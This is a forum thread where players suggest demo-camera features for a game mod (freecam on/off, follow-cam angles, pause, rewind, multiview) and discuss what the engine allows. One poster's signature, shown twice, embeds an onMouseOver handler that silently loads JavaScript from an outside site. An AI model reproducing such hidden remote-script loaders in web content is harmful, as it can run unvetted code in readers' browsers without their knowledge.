Demo view suggestions

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

squadjot

Demo view suggestions

Post by squadjot »

Hey..ive been playing around witht he new demo features..and its great.

I got some wishes for next versions

1. Could the freecam -command be changed into a +freecam -freecam or freecam 1/0 instead of a toggle.

2. Could you add cam-angles to the follow-cam? maybe b_demo_followXangle, b_demo_followZangle, b_demo_followYangle? (to control the angle of the view of the projectile u follow)

3. A new feature!..(dunno if its possible like that) Well i wondered if u set a cam on our aim, with a custom distance value .plus a either flip effect (view FROM your point...or view TO your point)..or a add a angle..
gah..hard to explain.. oke imagine..u have a long line drawn from your gun..in a straight line to infinity :P... i want a cam across that line.. the cam would seem as somekind of zoom effect..but if u flipped it..it would point at the nozzle of the gun..(the gun that draws the gun-"line" wich the cam are attached to)

4. a pause command..that works better than freezedemo (or even rewind, heard that was impossible tho)
MeeZ

Re: Demo view suggestions

Post by MeeZ »

squadjot wrote:Hey..ive been playing around witht he new demo features..and its great.

I got some wishes for next versions

1. Could the freecam -command be changed into a +freecam -freecam or freecam 1/0 instead of a toggle.

2. Could you add cam-angles to the follow-cam? maybe b_demo_followXangle, b_demo_followZangle, b_demo_followYangle? (to control the angle of the view of the projectile u follow)

3. A new feature!..(dunno if its possible like that) Well i wondered if u set a cam on our aim, with a custom distance value .plus a either flip effect (view FROM your point...or view TO your point)..or a add a angle..
gah..hard to explain.. oke imagine..u have a long line drawn from your gun..in a straight line to infinity :P... i want a cam across that line.. the cam would seem as somekind of zoom effect..but if u flipped it..it would point at the nozzle of the gun..(the gun that draws the gun-"line" wich the cam are attached to)

(or even rewind, heard that was impossible tho)
it is DEFINATELY impossible... I have not seen a single game that can re-wind demo's. This is because of how it works... Just check out the q3 engine source.
Meez
#eat - Quakenet
#necromantia - Quakenet
Deus

Post by Deus »

MeeZ wrote:Just check out the q3 engine source.
So You have it ?
Rain

Post by Rain »

squadjot wrote:1. Could the freecam -command be changed into a +freecam -freecam or freecam 1/0 instead of a toggle.
The next version of etpro will support 'freecam on' and 'freecam off' a là noclip.
squadjot wrote:4. a pause command..that works better than freezedemo (or even rewind, heard that was impossible tho)
What does freezedemo do that isn't desirable?

Rewinding demos isn't possible from a mod--they don't have enough control over what the engine does with the demo. Even if they did, it would be a very difficult task because of the way demos are handled.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
squadjot

Post by squadjot »

freeze demo, does not freeze the demo..it freezes the "picture"..but the demo continues..."underneith" the frozen frame.. :)
Rain

Post by Rain »

Er, are you sure about that?
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
squadjot

Post by squadjot »

positive... unless its buggy... but yes..occured all the times ive tried..and ive tested the demo functions alot lately..
defragga

Post by defragga »

Rain wrote:Er, are you sure about that?
100 percent ... I recognized the same, timescale 0 just displays a conn interupted symbol, but in the background demo playback goes on (but I think not in timescale 1, but in timescale 0.1 ?)
fretn

Post by fretn »

afaik there's a q2 which has a demo-rewind option, or at least they are working on it, can't remember the name tho'

I like n°3 :)
Day by day : http://w.twwwo.be/
shake

Post by shake »

instead of cam angles to the weaponcam, would it be possible to have a mouselook-type thing on the weaponcams like the original panzercam in EDV for rtcw?
squadjot

Post by squadjot »

is multiview possible? ...during playback of demo's
Rain

Post by Rain »

Only if multiview was used while recording the demo.
(You'll get info for people you weren't watching while recording, though, so long as they were on the mv list.)
squadjot

Post by squadjot »

thnx :)
fretn

Post by fretn »

shake wrote:instead of cam angles to the weaponcam, would it be possible to have a mouselook-type thing on the weaponcams like the original panzercam in EDV for rtcw?
that was actually a bug in the rtcw version :) but it was a friendly one ;)
Day by day : http://w.twwwo.be/
squadjot

Post by squadjot »

well..any kind of orbiting around the weapon would be cool...imo.. or a "lookat"-cam could also be cool (combined with freecam) maybe both (y)